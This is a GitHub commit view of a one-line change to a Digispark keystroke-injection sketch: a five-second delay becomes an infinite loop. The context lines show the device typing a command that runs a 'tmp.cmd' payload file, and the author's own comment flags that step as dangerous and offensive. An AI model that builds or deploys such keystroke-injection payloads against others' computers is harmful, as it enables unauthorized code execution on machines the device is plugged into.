Replaced 5s end time window with an infinity loop

This commit is contained in:
CedArctic 2018-02-18 16:47:44 +02:00 committed by GitHub
parent 9a7c44263e
commit 6923ca8485
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -54,5 +54,5 @@ void loop() {
DigiKeyboard.delay(500);
DigiKeyboard.println("tmp.cmd && exit"); // Start the payload file and exit (DANGEROUS/OFFENSIVE STEP! Please comment this line if you want to test inoffensively on your own PC)
digitalWrite(1, LOW); // LED off <--> Action end
DigiKeyboard.delay(5000); // 5 seconds delay to unplug the device safely between loops
for(;;){ /*Infinite loop to disconnect device*/ }
}